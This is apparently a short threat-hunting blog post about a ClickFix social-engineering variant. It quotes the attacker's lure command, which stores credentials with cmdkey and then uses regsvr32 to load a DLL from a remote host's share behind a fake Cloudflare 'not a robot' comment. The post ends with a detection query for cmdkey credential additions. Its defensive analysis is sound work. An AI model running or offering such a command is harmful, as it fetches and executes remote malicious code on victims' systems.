390. A New ClickFix Variant Abuses Cmdkey

Hello everyone!

Today we’re going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004).

This time, according to the report, the attackers prompted the victim to run the following command:

C:\WINDOWS\system32\cmd.exe /c

cmdkey /add:151.245.195[.]142 /user:guest &&

start regsvr32 /s \\151.245.195[.]142\hi\demo.dll &

REM I am not a robot – Cloudflare ID: d7f5a3335794c434

As you can see, before registering a malicious library from a remote server using regsvr32.exe, the attackers use cmdkey.exe to store credentials for accessing that server.

And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to the Windows Credential Manager:

event_type: "processcreatewin"

AND

proc_file_path: "cmdkey.exe"

AND

cmdline: "add"

See you soon!

Comments

Popular posts from this blog

082. Huniting for Malicious Browser Extensions

033. Free Google Threat Intelligence Course

163. A Curious Case of Iediagcmd.exe Abuse